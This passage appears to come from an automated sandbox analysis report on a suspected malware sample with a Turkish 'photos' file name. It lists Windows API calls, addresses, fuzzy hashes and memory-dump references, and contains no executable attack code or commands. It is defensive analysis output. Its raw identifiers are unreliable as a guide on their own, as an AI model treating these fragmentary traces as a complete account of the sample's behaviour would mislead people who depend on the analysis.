                                                                      • Opcode Fuzzy Hash: de82b6e1ea68da3efc6c56b99a62e66147e8c7b85719b9a7b20ee67dd20bb196
                                                                      • Instruction Fuzzy Hash: 833185B0A04381AEEB34FB749C49BB63BB8EB05B04F080569F45AC6290E775D685DB31
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00D8C13C,00000000), ref: 00D8CE56
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00D8CE8D
                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00D8C13C,00000000), ref: 00D8CED2
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00D8C13C,00000000), ref: 00D8CEE6
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00D8C13C,00000000), ref: 00D8CF10
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                      • String ID:
                                                                      • API String ID: 3191363074-0
                                                                      • Opcode ID: 77e8f8fdd7d3896e5ab90c3c35a32138ccfe3215cc765aac61c3afd16e1beea7
                                                                      • Instruction ID: 4781c8427b4272215f2518550a0d4accc1b278d5760a2d2b98a71a17e1242edc
                                                                      • Opcode Fuzzy Hash: 77e8f8fdd7d3896e5ab90c3c35a32138ccfe3215cc765aac61c3afd16e1beea7
                                                                      • Instruction Fuzzy Hash: 05315C72A24305EFDB21EFA5D884AABBBF8EF15354B14542EF546D2240D730EE419B70
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00D71859
                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00D71905
                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00D7190D
                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00D7191E
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00D71926
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: c2ce6f1cded3ce3fdab05029bb002590db30af8855ad5461619efb6c7379e67a
                                                                      • Instruction ID: b9735a454d81c877d79da80588bc666afc5badb409886c9716600f474dc8ede5
                                                                      • Opcode Fuzzy Hash: c2ce6f1cded3ce3fdab05029bb002590db30af8855ad5461619efb6c7379e67a
                                                                      • Instruction Fuzzy Hash: AC31AD75A00219EFCB14CFA8C889A9E3BB5EB05315F148329FA25A72D0D3709954CBA1
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DA567A
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DA56D2
                                                                      • _wcslen.LIBCMT ref: 00DA56E4
                                                                      • _wcslen.LIBCMT ref: 00DA56EF
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DA574B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 763830540-0
                                                                      • Opcode ID: ee22e1138633365eecc64649c582e8135a1e83cca5ade72cf084044f569f2363
                                                                      • Instruction ID: e93d08b476f171603151f9eea3bcb3e0fbaee4597b275cb33450ef2c5b57df5f
                                                                      • Opcode Fuzzy Hash: ee22e1138633365eecc64649c582e8135a1e83cca5ade72cf084044f569f2363
                                                                      • Instruction Fuzzy Hash: 4221A571900708AADF109FA4EC84AED77B8FF46364F144216F919EA284D770D985CF70
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00D90878
                                                                      • GetForegroundWindow.USER32 ref: 00D9088F
                                                                      • GetDC.USER32(00000000), ref: 00D908CB
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00D908D7
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00D9090F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: 88df27ad8b3de5dfcc4a462813b42ceead648d886a4336a5463d38f785cd2845
                                                                      • Instruction ID: 3d14a99f95bd0af86ac7889b419e296bd4cc3aa11b8e32e1fac92223b68a6cb9
                                                                      • Opcode Fuzzy Hash: 88df27ad8b3de5dfcc4a462813b42ceead648d886a4336a5463d38f785cd2845
                                                                      • Instruction Fuzzy Hash: A4218175610214AFD704EF69DD84AAA7BE9FF49710F048428F85AD7761DB30AC45CBB0
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00D4CD66
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4CD89
                                                                        • Part of subcall function 00D437B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D2FD75,?,?,00D1B63D,00000000,?,?,?,00D8106C,00DAD0D0,?,00D5242E), ref: 00D437E2
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D4CDAF
                                                                      • _free.LIBCMT ref: 00D4CDC2
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4CDD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: a11149d4b9b0ad6d33e616f533f495f2fdbc326baf2a868b7081d8744c7dc1aa
                                                                      • Instruction ID: 00d8c053fe681452a062010a9cca12c8e9d8248c168ffcf143a15053ea4f6946
                                                                      • Opcode Fuzzy Hash: a11149d4b9b0ad6d33e616f533f495f2fdbc326baf2a868b7081d8744c7dc1aa
                                                                      • Instruction Fuzzy Hash: 45017C77A227157F67611AAA5C88C7B6E6DEAC7BA1319113AB905C6200EB618C0286B0
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D2AB19
                                                                      • SelectObject.GDI32(?,00000000), ref: 00D2AB28
                                                                      • BeginPath.GDI32(?), ref: 00D2AB3F
                                                                      • SelectObject.GDI32(?,00000000), ref: 00D2AB68
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 7241cfa918c6d5b1b3d2b4378d68d3506df30288c7de56ea6d27fcc1df9b51d1
                                                                      • Instruction ID: af338de32363cdef640a359d06c86b63f509d8f7ad0106112aef5059b451f945
                                                                      • Opcode Fuzzy Hash: 7241cfa918c6d5b1b3d2b4378d68d3506df30288c7de56ea6d27fcc1df9b51d1
                                                                      • Instruction Fuzzy Hash: 5321B034A01354EFDB11AF28ED58BA97BB5FB11729F144315F420EA2A2D3708881CFB1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 8182c4b81362ee16a4cec41b55e5108df483b1fb2c6c20c684f05b496ebf0feb
                                                                      • Instruction ID: 4f5b8ad775389c05ed1845bedf08fc2f296dc121d8c002d22d0cba463e29ab3e
                                                                      • Opcode Fuzzy Hash: 8182c4b81362ee16a4cec41b55e5108df483b1fb2c6c20c684f05b496ebf0feb
                                                                      • Instruction Fuzzy Hash: ED01F576601A1A7FE6106711EC82FEF735CEA21398F548064FD0896244FB91FD1582F6
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00D3F26E,00D437F3,00000001,?,00D2FD75,?,?,00D1B63D,00000000,?,?,?,00D8106C), ref: 00D42D8D
                                                                      • _free.LIBCMT ref: 00D42DC2
                                                                      • _free.LIBCMT ref: 00D42DE9
                                                                      • SetLastError.KERNEL32(00000000), ref: 00D42DF6
                                                                      • SetLastError.KERNEL32(00000000), ref: 00D42DFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: e7b0dc778803fc23607332e25870098552963b695c2a93bb950cd0ad17d47ceb
                                                                      • Instruction ID: e2065d4e73cf33b2e4cd73c43ee8f5b4e231f707f798958af70a0ee72bc5a40c
                                                                      • Opcode Fuzzy Hash: e7b0dc778803fc23607332e25870098552963b695c2a93bb950cd0ad17d47ceb
                                                                      • Instruction Fuzzy Hash: DB012832A517027BC7126735AC8AD3B166EEBC23B0BA50425F415E2292EF74CC4295B0
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00D7E8B5
                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00D7E8C3
                                                                      • Sleep.KERNEL32(00000000), ref: 00D7E8CB
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00D7E8D5
                                                                      • Sleep.KERNEL32 ref: 00D7E911
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 6fbb5d56657a9b189cc76caf1ad80c2018d27ed1ac3c8651b3a4a82ba72ab1c5
                                                                      • Instruction ID: 8f314187323a8ac77e09cff4047d5730e558bcdc64dc82199e1ef01779145763
                                                                      • Opcode Fuzzy Hash: 6fbb5d56657a9b189cc76caf1ad80c2018d27ed1ac3c8651b3a4a82ba72ab1c5
                                                                      • Instruction Fuzzy Hash: FB011B31E1071ADBCF00AFA5D858AEDBB78BB0E711F014496D645F2251DB3496548B71
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D71058
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D71064
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D71073
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D7107A
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D71091
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 0d3c0ca0136ad5f08476ddc5f047b0ea1d66e72a3a8fcbd467e8b0db865e5150
                                                                      • Instruction ID: df684fedfbe9380368b0ba339636fe9328b5e19b341449fb99126274b6c09f78
                                                                      • Opcode Fuzzy Hash: 0d3c0ca0136ad5f08476ddc5f047b0ea1d66e72a3a8fcbd467e8b0db865e5150
                                                                      • Instruction Fuzzy Hash: EE011979210305BFDB114FA9DC59E6A3A6EEF8A3B0B254414F949D7360DB71DD408A70
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D70F0E
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D70F1A
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D70F29
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D70F30
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D70F46
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 2c3760957d64d0ffe735898a7ae0b12c067e4dae80c671ae7822e58f710da019
                                                                      • Instruction ID: 86f0825f482750cf29186fb5d06426f51417680fcf7e7c0f21bff398a71a5722
                                                                      • Opcode Fuzzy Hash: 2c3760957d64d0ffe735898a7ae0b12c067e4dae80c671ae7822e58f710da019
                                                                      • Instruction Fuzzy Hash: 9DF04935210305ABDB214FA4AC4AF563BAEEF8A760F144414FA49C6391EA70DC408A70
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D70F6E
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D70F7A
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D70F89
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D70F90
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D70FA6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: b2798ba9366555e9a5c68739b0fecbd696dddfd56886829119407a304b469ff9
                                                                      • Instruction ID: 0648d4b510b05957ef00008a00d11ad4d85621b3e66e7494959b7376aac3cc6f
                                                                      • Opcode Fuzzy Hash: b2798ba9366555e9a5c68739b0fecbd696dddfd56886829119407a304b469ff9
                                                                      • Instruction Fuzzy Hash: DCF04975210305ABDB214FA4EC49F567BAEEF8A760F154414FA49C6390EA70D8508A70
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D8009B,?,00D8321A,?,00000001,00D5311E,?), ref: 00D80242
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D8009B,?,00D8321A,?,00000001,00D5311E,?), ref: 00D8024F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D8009B,?,00D8321A,?,00000001,00D5311E,?), ref: 00D8025C
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D8009B,?,00D8321A,?,00000001,00D5311E,?), ref: 00D80269
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D8009B,?,00D8321A,?,00000001,00D5311E,?), ref: 00D80276
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00D8009B,?,00D8321A,?,00000001,00D5311E,?), ref: 00D80283
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 47b54c415a990d7a3b570ad9163e74de09102b8bce047922c48fde280a8379bd
                                                                      • Instruction ID: 2bf27d3e5a32a8101c1ef112abbc3e642e8f9ff3199ff2034da82713d8aa6eec
                                                                      • Opcode Fuzzy Hash: 47b54c415a990d7a3b570ad9163e74de09102b8bce047922c48fde280a8379bd
                                                                      • Instruction Fuzzy Hash: EE01C471800B15DFCB71AF66D880416FBF5BF503153198A3FD1A651931C3B0A948CF94
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00D4D6F2
                                                                        • Part of subcall function 00D42958: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000), ref: 00D4296E
                                                                        • Part of subcall function 00D42958: GetLastError.KERNEL32(00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000,00000000), ref: 00D42980
                                                                      • _free.LIBCMT ref: 00D4D704
                                                                      • _free.LIBCMT ref: 00D4D716
                                                                      • _free.LIBCMT ref: 00D4D728
                                                                      • _free.LIBCMT ref: 00D4D73A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: be31c8eb6d6c78dc389bdf4f3370f751e94e1f595480e78c385a2ac1513b3021
                                                                      • Instruction ID: d221d96c1563c6635d14bcbf3a974bbcefe9754b03b76151c78e5e5b46c3c997
                                                                      • Opcode Fuzzy Hash: be31c8eb6d6c78dc389bdf4f3370f751e94e1f595480e78c385a2ac1513b3021
                                                                      • Instruction Fuzzy Hash: 33F0EC3269534AAB8620EB54E9C5D2A77DEFB44710B991806F049E7641CA30FCC08A74
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00D75BAE
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D75BC5
                                                                      • MessageBeep.USER32(00000000), ref: 00D75BDD
                                                                      • KillTimer.USER32(?,0000040A), ref: 00D75BF9
                                                                      • EndDialog.USER32(?,00000001), ref: 00D75C13
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: bcfb81b43e5bb3fb6f903bf8e9a0392dbc81d1dd665c88b9914c2be558e4f1e0
                                                                      • Instruction ID: 12a0b5d208e33462385fb88783050ebf4022c466ebed8c3e75b0f280716af96b
                                                                      • Opcode Fuzzy Hash: bcfb81b43e5bb3fb6f903bf8e9a0392dbc81d1dd665c88b9914c2be558e4f1e0
                                                                      • Instruction Fuzzy Hash: 92018130510704ABEB219B10ED8EFA677B8BB05715F085559A186A10F1EBF4A9948BA2
                                                                      APIs
